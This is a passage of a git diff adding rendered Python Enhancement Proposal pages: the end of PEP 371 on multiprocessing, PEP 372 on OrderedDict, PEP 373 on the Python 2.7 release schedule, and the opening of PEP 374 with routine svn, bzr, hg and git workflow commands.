One item of note however, is that there is an implicit overhead +within the pyprocessing package’s Queue implementation due to the +object serialization.

+

Alec Thomas provided a short example based on the +run_benchmarks.py script to demonstrate this overhead versus the +default Queue implementation:

+
cmd: run_bench_queue.py
+non_threaded (1 iters)  0.010546 seconds
+threaded (1 threads)    0.015164 seconds
+processes (1 procs)     0.066167 seconds
+
+non_threaded (2 iters)  0.020768 seconds
+threaded (2 threads)    0.041635 seconds
+processes (2 procs)     0.084270 seconds
+
+non_threaded (4 iters)  0.041718 seconds
+threaded (4 threads)    0.086394 seconds
+processes (4 procs)     0.144176 seconds
+
+non_threaded (8 iters)  0.083488 seconds
+threaded (8 threads)    0.184254 seconds
+processes (8 procs)     0.302999 seconds
+
+
+

Additional benchmarks can be found in the pyprocessing package’s +source distribution’s examples/ directory. The examples will be +included in the package’s documentation.

+
+
+

Maintenance

+

Richard M. Oudkerk - the author of the pyprocessing package has +agreed to maintain the package within Python SVN. Jesse Noller +has volunteered to also help maintain/document and test the +package.

+
+
+

API Naming

+

While the aim of the package’s API is designed to closely mimic that of +the threading and Queue modules as of python 2.x, those modules are not +PEP 8 compliant. It has been decided that instead of adding the package +“as is” and therefore perpetuating the non-PEP 8 compliant naming, we +will rename all APIs, classes, etc to be fully PEP 8 compliant.

+

This change does affect the ease-of-drop in replacement for those using +the threading module, but that is an acceptable side-effect in the view +of the authors, especially given that the threading module’s own API +will change.

+

Issue 3042 in the tracker proposes that for Python 2.6 there will be +two APIs for the threading module - the current one, and the PEP 8 +compliant one. Warnings about the upcoming removal of the original +java-style API will be issued when -3 is invoked.

+

In Python 3000, the threading API will become PEP 8 compliant, which +means that the multiprocessing module and the threading module will +again have matching APIs.

+
+
+

Timing/Schedule

+

Some concerns have been raised about the timing/lateness of this +PEP for the 2.6 and 3.0 releases this year, however it is felt by +both the authors and others that the functionality this package +offers surpasses the risk of inclusion.

+

However, taking into account the desire not to destabilize +Python-core, some refactoring of pyprocessing’s code “into” +Python-core can be withheld until the next 2.x/3.x releases. This +means that the actual risk to Python-core is minimal, and largely +constrained to the actual package itself.

+
+
+

Open Issues

+
    +
  • Confirm no “default” remote connection capabilities, if needed +enable the remote security mechanisms by default for those +classes which offer remote capabilities.
  • +
  • Some of the API (Queue methods qsize(), task_done() and join()) +either need to be added, or the reason for their exclusion needs +to be identified and documented clearly.
  • +
+
+
+

Closed Issues

+
    +
  • The PyGILState bug patch submitted in issue 1683 by roudkerk +must be applied for the package unit tests to work.
  • +
  • Existing documentation has to be moved to ReST formatting.
  • +
  • Reliance on ctypes: The pyprocessing package’s reliance on +ctypes prevents the package from functioning on platforms where +ctypes is not supported. This is not a restriction of this +package, but rather of ctypes.
  • +
  • DONE: Rename top-level package from “pyprocessing” to +“multiprocessing”.
  • +
  • DONE: Also note that the default behavior of process spawning +does not make it compatible with use within IDLE as-is, this +will be examined as a bug-fix or “setExecutable” enhancement.
  • +
  • DONE: Add in “multiprocessing.setExecutable()” method to override the +default behavior of the package to spawn processes using the +current executable name rather than the Python interpreter. Note +that Mark Hammond has suggested a factory-style interface for +this [7].
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0371.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0372/index.html b/pep-0372/index.html new file mode 100644 index 00000000000..de2877d45ad --- /dev/null +++ b/pep-0372/index.html @@ -0,0 +1,405 @@ + + + + + + + + PEP 372 – Adding an ordered dictionary to collections | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 372 – Adding an ordered dictionary to collections

+
+
Author:
+
Armin Ronacher <armin.ronacher at active-4.com>, +Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Jun-2008
+
Python-Version:
+
2.7, 3.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an ordered dictionary as a new data structure for +the collections module, called “OrderedDict” in this PEP. The +proposed API incorporates the experiences gained from working with +similar implementations that exist in various real-world applications +and other programming languages.

+
+
+

Patch

+

A working Py3.1 patch including tests and documentation is at:

+
+
+

The check-in was in revisions: 70101 and 70102

+
+
+

Rationale

+

In current Python versions, the widely used built-in dict type does +not specify an order for the key/value pairs stored. This makes it +hard to use dictionaries as data storage for some specific use cases.

+

Some dynamic programming languages like PHP and Ruby 1.9 guarantee a +certain order on iteration. In those languages, and existing Python +ordered-dict implementations, the ordering of items is defined by the +time of insertion of the key. New keys are appended at the end, but +keys that are overwritten are not moved to the end.

+

The following example shows the behavior for simple assignments:

+
>>> d = OrderedDict()
+>>> d['parrot'] = 'dead'
+>>> d['penguin'] = 'exploded'
+>>> d.items()
+[('parrot', 'dead'), ('penguin', 'exploded')]
+
+
+

That the ordering is preserved makes an OrderedDict useful for a couple of +situations:

+
    +
  • XML/HTML processing libraries currently drop the ordering of +attributes, use a list instead of a dict which makes filtering +cumbersome, or implement their own ordered dictionary. This affects +ElementTree, html5lib, Genshi and many more libraries.
  • +
  • There are many ordered dict implementations in various libraries +and applications, most of them subtly incompatible with each other. +Furthermore, subclassing dict is a non-trivial task and many +implementations don’t override all the methods properly which can +lead to unexpected results.

    Additionally, many ordered dicts are implemented in an inefficient +way, making many operations more complex then they have to be.

    +
  • +
  • PEP 3115 allows metaclasses to change the mapping object used for +the class body. An ordered dict could be used to create ordered +member declarations similar to C structs. This could be useful, for +example, for future ctypes releases as well as ORMs that define +database tables as classes, like the one the Django framework ships. +Django currently uses an ugly hack to restore the ordering of +members in database models.
  • +
  • The RawConfigParser class accepts a dict_type argument that +allows an application to set the type of dictionary used internally. +The motivation for this addition was expressly to allow users to +provide an ordered dictionary. [1]
  • +
  • Code ported from other programming languages such as PHP often +depends on an ordered dict. Having an implementation of an +ordering-preserving dictionary in the standard library could ease +the transition and improve the compatibility of different libraries.
  • +
+
+
+

Ordered Dict API

+

The ordered dict API would be mostly compatible with dict and existing +ordered dicts. Note: this PEP refers to the 2.7 and 3.0 dictionary +API as described in collections.Mapping abstract base class.

+

The constructor and update() both accept iterables of tuples as +well as mappings like a dict does. Unlike a regular dictionary, +the insertion order is preserved.

+
>>> d = OrderedDict([('a', 'b'), ('c', 'd')])
+>>> d.update({'foo': 'bar'})
+>>> d
+collections.OrderedDict([('a', 'b'), ('c', 'd'), ('foo', 'bar')])
+
+
+

If ordered dicts are updated from regular dicts, the ordering of new +keys is of course undefined.

+

All iteration methods as well as keys(), values() and +items() return the values ordered by the time the key was +first inserted:

+
>>> d['spam'] = 'eggs'
+>>> d.keys()
+['a', 'c', 'foo', 'spam']
+>>> d.values()
+['b', 'd', 'bar', 'eggs']
+>>> d.items()
+[('a', 'b'), ('c', 'd'), ('foo', 'bar'), ('spam', 'eggs')]
+
+
+

New methods not available on dict:

+
+
OrderedDict.__reversed__()
Supports reverse iteration by key.
+
+
+
+

Questions and Answers

+

What happens if an existing key is reassigned?

+
+
The key is not moved but assigned a new value in place. This is +consistent with existing implementations.
+

What happens if keys appear multiple times in the list passed to the +constructor?

+
+
The same as for regular dicts – the latter item overrides the +former. This has the side-effect that the position of the first +key is used because only the value is actually overwritten:
>>> OrderedDict([('a', 1), ('b', 2), ('a', 3)])
+collections.OrderedDict([('a', 3), ('b', 2)])
+
+
+

This behavior is consistent with existing implementations in +Python, the PHP array and the hashmap in Ruby 1.9.

+
+

Is the ordered dict a dict subclass? Why?

+
+
Yes. Like defaultdict, an ordered dictionary subclasses dict. +Being a dict subclass make some of the methods faster (like +__getitem__ and __len__). More importantly, being a dict +subclass lets ordered dictionaries be usable with tools like json that +insist on having dict inputs by testing isinstance(d, dict).
+

Do any limitations arise from subclassing dict?

+
+
Yes. Since the API for dicts is different in Py2.x and Py3.x, the +OrderedDict API must also be different. So, the Py2.7 version will need +to override iterkeys, itervalues, and iteritems.
+

Does OrderedDict.popitem() return a particular key/value pair?

+
+
Yes. It pops-off the most recently inserted new key and its +corresponding value. This corresponds to the usual LIFO behavior +exhibited by traditional push/pop pairs. It is semantically +equivalent to k=list(od)[-1]; v=od[k]; del od[k]; return (k,v). +The actual implementation is more efficient and pops directly +from a sorted list of keys.
+

Does OrderedDict support indexing, slicing, and whatnot?

+
+
As a matter of fact, OrderedDict does not implement the Sequence +interface. Rather, it is a MutableMapping that remembers +the order of key insertion. The only sequence-like addition is +support for reversed.

A further advantage of not allowing indexing is that it leaves open +the possibility of a fast C implementation using linked lists.

+
+

Does OrderedDict support alternate sort orders such as alphabetical?

+
+
No. Those wanting different sort orders really need to be using another +technique. The OrderedDict is all about recording insertion order. If any +other order is of interest, then another structure (like an in-memory +dbm) is likely a better fit.
+

How well does OrderedDict work with the json module, PyYAML, and ConfigParser?

+
+
For json, the good news is that json’s encoder respects OrderedDict’s iteration order:
>>> items = [('one', 1), ('two', 2), ('three',3), ('four',4), ('five',5)]
+>>> json.dumps(OrderedDict(items))
+'{"one": 1, "two": 2, "three": 3, "four": 4, "five": 5}'
+
+
+

In Py2.6, the object_hook for json decoders passes-in an already built +dictionary so order is lost before the object hook sees it. This +problem is being fixed for Python 2.7/3.1 by adding a new hook that +preserves order (see https://github.com/python/cpython/issues/49631 ). +With the new hook, order can be preserved:

+
>>> jtext = '{"one": 1, "two": 2, "three": 3, "four": 4, "five": 5}'
+>>> json.loads(jtext, object_pairs_hook=OrderedDict)
+OrderedDict({'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5})
+
+
+

For PyYAML, a full round-trip is problem free:

+
>>> ytext = yaml.dump(OrderedDict(items))
+>>> print ytext
+!!python/object/apply:collections.OrderedDict
+- - [one, 1]
+  - [two, 2]
+  - [three, 3]
+  - [four, 4]
+  - [five, 5]
+
+>>> yaml.load(ytext)
+OrderedDict({'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5})
+
+
+

For the ConfigParser module, round-tripping is also problem free. Custom +dicts were added in Py2.6 specifically to support ordered dictionaries:

+
>>> config = ConfigParser(dict_type=OrderedDict)
+>>> config.read('myconfig.ini')
+>>> config.remove_option('Log', 'error')
+>>> config.write(open('myconfig.ini', 'w'))
+
+
+
+

How does OrderedDict handle equality testing?

+
+
Comparing two ordered dictionaries implies that the test will be +order-sensitive so that list (od1.items())==list(od2.items()).

When ordered dicts are compared with other Mappings, their order +insensitive comparison is used. This allows ordered dictionaries +to be substituted anywhere regular dictionaries are used.

+
+

How __repr__ format will maintain order during a repr/eval round-trip?

+
+
OrderedDict([(‘a’, 1), (‘b’, 2)])
+

What are the trade-offs of the possible underlying data structures?

+
+
    +
  • Keeping a sorted list of keys is fast for all operations except +__delitem__() which becomes an O(n) exercise. This data structure leads +to very simple code and little wasted space.
  • +
  • Keeping a separate dictionary to record insertion sequence numbers makes +the code a little bit more complex. All of the basic operations are O(1) +but the constant factor is increased for __setitem__() and __delitem__() +meaning that every use case will have to pay for this speedup (since all +buildup go through __setitem__). Also, the first traversal incurs a +one-time O(n log n) sorting cost. The storage costs are double that +for the sorted-list-of-keys approach.
  • +
  • A version written in C could use a linked list. The code would be more +complex than the other two approaches but it would conserve space and +would keep the same big-oh performance as regular dictionaries. It is +the fastest and most space efficient.
  • +
+
+
+
+

Reference Implementation

+

An implementation with tests and documentation is at:

+
+
+

The proposed version has several merits:

+
    +
  • Strict compliance with the MutableMapping API and no new methods +so that the learning curve is near zero. It is simply a dictionary +that remembers insertion order.
  • +
  • Generally good performance. The big-oh times are the same as regular +dictionaries except that key deletion is O(n).
  • +
+

Other implementations of ordered dicts in various Python projects or +standalone libraries, that inspired the API proposed here, are:

+ +
+
+

Future Directions

+

With the availability of an ordered dict in the standard library, +other libraries may take advantage of that. For example, ElementTree +could return odicts in the future that retain the attribute ordering +of the source file.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0372.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0373/index.html b/pep-0373/index.html new file mode 100644 index 00000000000..f779741edca --- /dev/null +++ b/pep-0373/index.html @@ -0,0 +1,253 @@ + + + + + + + + PEP 373 – Python 2.7 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 373 – Python 2.7 Release Schedule

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
03-Nov-2008
+
Python-Version:
+
2.7
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.7.

+

Python 2.7 is the end of the Python 2.x series, and is succeeded by +Python 3. See the “Sunsetting Python 2” FAQ on python.org for a general +overview.

+
+
+

Update (April 2014)

+

The End Of Life date (EOL, sunset date) for Python 2.7 has been moved +five years into the future, to 2020. This decision was made to +clarify the status of Python 2.7 and relieve worries for those users +who cannot yet migrate to Python 3. See also PEP 466.

+

This declaration does not guarantee that bugfix releases will be made +on a regular basis, but it should enable volunteers who want to +contribute bugfixes for Python 2.7 and it should satisfy vendors who +still have to support Python 2 for years to come.

+

There will be no Python 2.8 (see PEP 404).

+
+
+

Release Manager and Crew

+ + + + + + + + + + + + + + + + + +
PositionName
2.7 Release ManagerBenjamin Peterson
Windows installersSteve Dower
Mac installersNed Deily
+
+
+

Maintenance releases

+

Being the last of the 2.x series, 2.7 received bugfix support until +2020. Support officially stopped January 1 2020, and 2.7.18 code +freeze occurred on January 1 2020, but the final release occurred +after that date.

+

Dates of previous maintenance releases:

+
    +
  • 2.7.1 2010-11-27
  • +
  • 2.7.2 2011-07-21
  • +
  • 2.7.3rc1 2012-02-23
  • +
  • 2.7.3rc2 2012-03-15
  • +
  • 2.7.3 2012-03-09
  • +
  • 2.7.4rc1 2013-03-23
  • +
  • 2.7.4 2013-04-06
  • +
  • 2.7.5 2013-05-12
  • +
  • 2.7.6rc1 2013-10-26
  • +
  • 2.7.6 2013-11-10
  • +
  • 2.7.7rc1 2014-05-17
  • +
  • 2.7.7 2014-05-31
  • +
  • 2.7.8 2014-06-30
  • +
  • 2.7.9rc1 2014-11-26
  • +
  • 2.7.9 2014-12-10
  • +
  • 2.7.10rc1 2015-05-09
  • +
  • 2.7.10 2015-05-23
  • +
  • 2.7.11rc1 2015-11-21
  • +
  • 2.7.11 2015-12-05
  • +
  • 2.7.12 2016-06-25
  • +
  • 2.7.13rc1 2016-12-03
  • +
  • 2.7.13 2016-12-17
  • +
  • 2.7.14rc1 2017-08-26
  • +
  • 2.7.14 2017-09-16
  • +
  • 2.7.15rc1 2018-04-14
  • +
  • 2.7.15 2018-05-01
  • +
  • 2.7.16rc 2019-02-16
  • +
  • 2.7.16 2019-03-02
  • +
  • 2.7.17rc1 2019-10-05
  • +
  • 2.7.17 2019-10-19
  • +
  • 2.7.18rc1 2020-04-04
  • +
  • 2.7.18 2020-04-20
  • +
+
+
+

2.7.0 Release Schedule

+

The release schedule for 2.7.0 was:

+
    +
  • 2.7 alpha 1 2009-12-05
  • +
  • 2.7 alpha 2 2010-01-09
  • +
  • 2.7 alpha 3 2010-02-06
  • +
  • 2.7 alpha 4 2010-03-06
  • +
  • 2.7 beta 1 2010-04-03
  • +
  • 2.7 beta 2 2010-05-08
  • +
  • 2.7 rc1 2010-06-05
  • +
  • 2.7 rc2 2010-06-19
  • +
  • 2.7 final 2010-07-03
  • +
+
+
+

Possible features for 2.7

+

Nothing here. [Note that a moratorium on core language changes is in effect.]

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0373.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0374/index.html b/pep-0374/index.html new file mode 100644 index 00000000000..1848a70dd8e --- /dev/null +++ b/pep-0374/index.html @@ -0,0 +1,1743 @@ + + + + + + + + PEP 374 – Choosing a distributed VCS for the Python project | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 374 – Choosing a distributed VCS for the Python project

+
+
Author:
+
Brett Cannon <brett at python.org>, +Stephen J. Turnbull <stephen at xemacs.org>, +Alexandre Vassalotti <alexandre at peadrop.com>, +Barry Warsaw <barry at python.org>, +Dirkjan Ochtman <dirkjan at ochtman.nl>
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
07-Nov-2008
+
Post-History:
+
07-Nov-2008, +22-Jan-2009
+
+
+
+
Table of Contents +
+
+

Rationale

+

Python has been using a centralized version control system (VCS; +first CVS, now Subversion) for years to great effect. Having a master +copy of the official version of Python provides people with a single +place to always get the official Python source code. It has also +allowed for the storage of the history of the language, mostly for +help with development, but also for posterity. And of course the V in +VCS is very helpful when developing.

+

But a centralized version control system has its drawbacks. First and +foremost, in order to have the benefits of version control with +Python in a seamless fashion, one must be a “core developer” (i.e. +someone with commit privileges on the master copy of Python). People +who are not core developers but who wish to work with Python’s +revision tree, e.g. anyone writing a patch for Python or creating a +custom version, do not have direct tool support for revisions. This +can be quite a limitation, since these non-core developers cannot +easily do basic tasks such as reverting changes to a previously +saved state, creating branches, publishing one’s changes with full +revision history, etc. For non-core developers, the last safe tree +state is one the Python developers happen to set, and this prevents +safe development. This second-class citizenship is a hindrance to +people who wish to contribute to Python with a patch of any +complexity and want a way to incrementally save their progress to +make their development lives easier.

+

There is also the issue of having to be online to be able to commit +one’s work. Because centralized VCSs keep a central copy that stores +all revisions, one must have Internet access in order for their +revisions to be stored; no Net, no commit. This can be annoying if +you happen to be traveling and lack any Internet. There is also the +situation of someone wishing to contribute to Python but having a +bad Internet connection where committing is time-consuming and +expensive and it might work out better to do it in a single step.

+

Another drawback to a centralized VCS is that a common use case is +for a developer to revise patches in response to review comments. +This is more difficult with a centralized model because there’s no +place to contain intermediate work. It’s either all checked in or +none of it is checked in. In the centralized VCS, it’s also very +difficult to track changes to the trunk as they are committed, while +you’re working on your feature or bug fix branch. This increases +the risk that such branches will grow stale, out-dated, or that +merging them into the trunk will generate too may conflicts to be +easily resolved.

+

Lastly, there is the issue of maintenance of Python. At any one time +there is at least one major version of Python under development (at +the time of this writing there are two). For each major version of +Python under development there is at least the maintenance version +of the last minor version and the in-development minor version (e.g. +with 2.6 just released, that means that both 2.6 and 2.7 are being +worked on). Once a release is done, a branch is created between the +code bases where changes in one version do not (but could) belong in +the other version. As of right now there is no natural support for +this branch in time in central VCSs; you must use tools that +simulate the branching. Tracking merges is similarly painful for +developers, as revisions often need to be merged between four active +branches (e.g. 2.6 maintenance, 3.0 maintenance, 2.7 development, +3.1 development). In this case, VCSs such as Subversion only handle +this through arcane third party tools.

+

Distributed VCSs (DVCSs) solve all of these problems. While one can +keep a master copy of a revision tree, anyone is free to copy that +tree for their own use. This gives everyone the power to commit +changes to their copy, online or offline. It also more naturally +ties into the idea of branching in the history of a revision tree +for maintenance and the development of new features bound for +Python. DVCSs also provide a great many additional features that +centralized VCSs don’t or can’t provide.

+

This PEP explores the possibility of changing Python’s use of Subversion +to any of the currently popular DVCSs, in order to gain +the benefits outlined above. This PEP does not guarantee that a switch +to a DVCS will occur at the conclusion of this PEP. It is quite +possible that no clear winner will be found and that svn will continue +to be used. If this happens, this PEP will be revisited and revised in +the future as the state of DVCSs evolves.

+
+
+

Terminology

+

Agreeing on a common terminology is surprisingly difficult, +primarily because each VCS uses these terms when describing subtly +different tasks, objects, and concepts. Where possible, we try to +provide a generic definition of the concepts, but you should consult +the individual system’s glossaries for details. Here are some basic +references for terminology, from some of the standard web-based +references on each VCS. You can also refer to glossaries for each +DVCS:

+ +
+
branch
A line of development; a collection of revisions, ordered by +time.
+
checkout/working copy/working tree
A tree of code the developer can edit, linked to a branch.
+
index
A “staging area” where a revision is built (unique to git).
+
repository
A collection of revisions, organized into branches.
+
clone
A complete copy of a branch or repository.
+
commit
To record a revision in a repository.
+
merge
Applying all the changes and history from one branch/repository +to another.
+
pull
To update a checkout/clone from the original branch/repository, +which can be remote or local
+
push/publish
To copy a revision, and all revisions it depends on, from a one +repository to another.
+
cherry-pick
To merge one or more specific revisions from one branch to +another, possibly in a different repository, possibly without its +dependent revisions.
+
rebase
To “detach” a branch, and move it to a new branch point; move +commits to the beginning of a branch instead of where they +happened in time.
+
+
+
+

Typical Workflow

+

At the moment, the typical workflow for a Python core developer is:

+
    +
  • Edit code in a checkout until it is stable enough to commit/push.
  • +
  • Commit to the master repository.
  • +
+

It is a rather simple workflow, but it has drawbacks. For one, +because any work that involves the repository takes time thanks to +the network, commits/pushes tend to not necessarily be as atomic as +possible. There is also the drawback of there not being a +necessarily cheap way to create new checkouts beyond a recursive +copy of the checkout directory.

+

A DVCS would lead to a workflow more like this:

+
    +
  • Branch off of a local clone of the master repository.
  • +
  • Edit code, committing in atomic pieces.
  • +
  • Merge the branch into the mainline, and
  • +
  • Push all commits to the master repository.
  • +
+

While there are more possible steps, the workflow is much more +independent of the master repository than is currently possible. By +being able to commit locally at the speed of your disk, a core +developer is able to do atomic commits much more frequently, +minimizing having commits that do multiple things to the code. Also +by using a branch, the changes are isolated (if desired) from other +changes being made by other developers. Because branches are cheap, +it is easy to create and maintain many smaller branches that address +one specific issue, e.g. one bug or one new feature. More +sophisticated features of DVCSs allow the developer to more easily +track long running development branches as the official mainline +progresses.

+
+
+

Contenders

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameShort NameVersion2.x Trunk Mirror3.x Trunk Mirror
Bazaarbzr1.12http://code.python.org/python/trunkhttp://code.python.org/python/3.0
Mercurialhg1.2.0http://code.python.org/hg/trunk/http://code.python.org/hg/branches/py3k/
gitN/A1.6.1git://code.python.org/python/trunkgit://code.python.org/python/branches/py3k
+

This PEP does not consider darcs, arch, or monotone. The main +problem with these DVCSs is that they are simply not popular enough +to bother supporting when they do not provide some very compelling +features that the other DVCSs provide. Arch and darcs also have +significant performance problems which seem unlikely to be addressed +in the near future.

+
+
+

Interoperability

+

For those who have already decided which DVCSs they want to use, and +are willing to maintain local mirrors themselves, all three DVCSs +support interchange via the git “fast-import” changeset format. git +does so natively, of course, and native support for Bazaar is under +active development, and getting good early reviews as of mid-February +2009. Mercurial has idiosyncratic support for importing via its hg +convert command, and third-party fast-import support is available +for exporting. Also, the Tailor tool supports automatic maintenance +of mirrors based on an official repository in any of the candidate +formats with a local mirror in any format.

+
+
+

Usage Scenarios

+

Probably the best way to help decide on whether/which DVCS should +replace Subversion is to see what it takes to perform some +real-world usage scenarios that developers (core and non-core) have +to work with. Each usage scenario outlines what it is, a bullet list +of what the basic steps are (which can vary slightly per VCS), and +how to perform the usage scenario in the various VCSs +(including Subversion).

+

Each VCS had a single author in charge of writing implementations +for each scenario (unless otherwise noted).

+ + + + + + + + + + + + + + + + + + + + +
NameVCS
Brettsvn
Barrybzr
Alexandrehg
Stephengit
+
+

Initial Setup

+

Some DVCSs have some perks if you do some initial setup upfront. +This section covers what can be done before any of the usage +scenarios are run in order to take better advantage of the tools.

+

All of the DVCSs support configuring your project identification. +Unlike the centralized systems, they use your email address to +identify your commits. (Access control is generally done by +mechanisms external to the DVCS, such as ssh or console login). +This identity may be associated with a full name.

+

All of the DVCSs will query the system to get some approximation to +this information, but that may not be what you want. They also +support setting this information on a per-user basis, and on a +per-project basis. Convenience commands to set these attributes vary, +but all allow direct editing of configuration files.

+

Some VCSs support end-of-line (EOL) conversions on checkout/checkin.

+
+

svn

+

None required, but it is recommended you follow the +guidelines +in the dev FAQ.

+
+
+

bzr

+

No setup is required, but for much quicker and space-efficient local +branching, you should create a shared repository to hold all your +Python branches. A shared repository is really just a parent +directory containing a .bzr directory. When bzr commits a revision, +it searches from the local directory on up the file system for a .bzr +directory to hold the revision. By sharing revisions across multiple +branches, you cut down on the amount of disk space used. Do this:

+
cd ~/projects
+bzr init-repo python
+cd python
+
+
+

Now, all your Python branches should be created inside of +~/projects/python.

+

There are also some settings you can put in your +~/.bzr/bazaar.conf +and ~/.bzr/locations.conf file to set up defaults for interacting +with Python code. None of them are required, although some are +recommended. E.g. I would suggest gpg signing all commits, but that +might be too high a barrier for developers. Also, you can set up +default push locations depending on where you want to push branches +by default. If you have write access to the master branches, that +push location could be code.python.org. Otherwise, it might be a +free Bazaar code hosting service such as Launchpad. If Bazaar is +chosen, we should decide what the policies and recommendations are.

+

At a minimum, I would set up your email address:

+
bzr whoami "Firstname Lastname <email.address@example.com>"
+
+
+

As with hg and git below, there are ways to set your email address (or really, +just about any parameter) on a +per-repository basis. You do this with settings in your +$HOME/.bazaar/locations.conf file, which has an ini-style format as does +the other DVCSs. See the Bazaar documentation for details, +which mostly aren’t relevant for this discussion.

+
+
+

hg

+

Minimally, you should set your user name. To do so, create the file +.hgrc in your home directory and add the following:

+
[ui]
+username = Firstname Lastname <email.address@example.com>
+
+
+

If you are using Windows and your tools do not support Unix-style newlines, +you can enable automatic newline translation by adding to your configuration:

+
[extensions]
+win32text =
+
+
+

These options can also be set locally to a given repository by +customizing <repo>/.hg/hgrc, instead of ~/.hgrc.

+
+
+

git

+

None needed. However, git supports a number of features that can +smooth your work, with a little preparation. git supports setting +defaults at the workspace, user, and system levels. The system +level is out of scope of this PEP. The user configuration file is +$HOME/.gitconfig on Unix-like systems, and the workspace +configuration file is $REPOSITORY/.git/config.

+

You can use the git-config tool to set preferences for user.name and +user.email either globally (for your system login account) or +locally (to a given git working copy), or you can edit the +configuration files (which have the same format as shown in the +Mercurial section above).:

+
# my full name doesn't change
+# note "--global" flag means per user
+# (system-wide configuration is set with "--system")
+git config --global user.name 'Firstname Lastname'
+# but use my Pythonic email address
+cd /path/to/python/repository
+git config user.email email.address@python.example.com
+
+
+

If you are using Windows, you probably want to set the core.autocrlf +and core.safecrlf preferences to true using git-config.:

+
# check out files with CRLF line endings rather than Unix-style LF only
+git config --global core.autocrlf true
+# scream if a transformation would be ambiguous
+# (eg, a working file contains both naked LF and CRLF)
+# and check them back in with the reverse transformation
+git config --global core.safecrlf true
+
+
+

Although the repository will usually contain a .gitignore file +specifying file names that rarely if ever should be registered in the +VCS, you may have personal conventions (e.g., always editing log +messages in a temporary file named “.msg”) that you may wish to +specify.:

+
# tell git where my personal ignores are
+git config --global core.excludesfile ~/.gitignore
+# I use .msg for my long commit logs, and Emacs makes backups in
+# files ending with ~
+# these are globs, not regular expressions
+echo '*~' >> ~/.gitignore
+echo '.msg' >> ~/.gitignore
+
+
+

If you use multiple branches, as with the other VCSes, you can save a +lot of space by putting all objects in a common object store. This +also can save download time, if the origins of the branches were in +different repositories, because objects are shared across branches in +your repository even if they were not present in the upstream +repositories. git is very space- and time-efficient and applies a +number of optimizations automatically, so this configuration is +optional. (Examples are omitted.)

+
+
+
+

One-Off Checkout

+

As a non-core developer, I want to create and publish a one-off patch +that fixes a bug, so that a core developer can review it for +inclusion in the mainline.

+
    +
  • Checkout/branch/clone trunk.
  • +
  • Edit some code.
  • +
  • Generate a patch (based on what is best supported by the VCS, e.g. +branch history).
  • +
  • Receive reviewer comments and address the issues.
  • +
  • Generate a second patch for the core developer to commit.
  • +
+
+

svn

+
svn checkout http://svn.python.org/projects/python/trunk
+cd trunk
+# Edit some code.
+echo "The cake is a lie!" > README
+# Since svn lacks support for local commits, we fake it with patches.
+svn diff >> commit-1.diff
+svn diff >> patch-1.diff
+# Upload the patch-1 to bugs.python.org.
+# Receive reviewer comments.
+# Edit some code.
+echo "The cake is real!" > README
+# Since svn lacks support for local commits, we fake it with patches.
+svn diff >> commit-2.diff
+svn diff >> patch-2.diff
+# Upload patch-2 to bugs.python.org
+
+
+
+
+

bzr

+
bzr branch http://code.python.org/python/trunk
+cd trunk
+# Edit some code.
+bzr commit -m 'Stuff I did'
+bzr send -o bundle
+# Upload bundle to bugs.python.org
+# Receive reviewer comments
+# Edit some code
+bzr commit -m 'Respond to reviewer comments'
+bzr send -o bundle
+# Upload updated bundle to bugs.python.org
+
+
+

The bundle file is like a super-patch. It can be read by patch(1) but +it contains additional metadata so that it can be fed to bzr merge to +produce a fully usable branch completely with history. See Patch Review +section below.

+
+
+

hg

+
hg clone http://code.python.org/hg/trunk
+cd trunk
+# Edit some code.
+hg commit -m "Stuff I did"
+hg outgoing -p > fixes.patch
+# Upload patch to bugs.python.org
+# Receive reviewer comments
+# Edit some code
+hg commit -m "Address reviewer comments."
+hg outgoing -p > additional-fixes.patch
+# Upload patch to bugs.python.org
+
+
+

While hg outgoing does not have the flag for it, most Mercurial +commands support git’s extended patch format through a --git +command. This can be set in one’s .hgrc file so that all commands +that generate a patch use the extended format.

+
+
+

git

+

The patches could be created with +git diff master > stuff-i-did.patch, too, but +git format-patch | git am knows some tricks +(empty files, renames, etc) that ordinary patch can’t handle. git +grabs “Stuff I did” out of the commit message to create the file +name 0001-Stuff-I-did.patch. See Patch Review below for a +description of the git-format-patch format.

+
# Get the mainline code.
+git clone git://code.python.org/python/trunk
+cd trunk
+# Edit some code.
+git commit -a -m 'Stuff I did.'
+# Create patch for my changes (i.e, relative to master).
+git format-patch master
+git tag stuff-v1
+# Upload 0001-Stuff-I-did.patch to bugs.python.org.
+# Time passes ... receive reviewer comments.
+# Edit more code.
+git commit -a -m 'Address reviewer comments.'
+# Make an add-on patch to apply on top of the original.
+git format-patch stuff-v1
+# Upload 0001-Address-reviewer-comments.patch to bugs.python.org.
+
+
+
+
+
+

Backing Out Changes

+

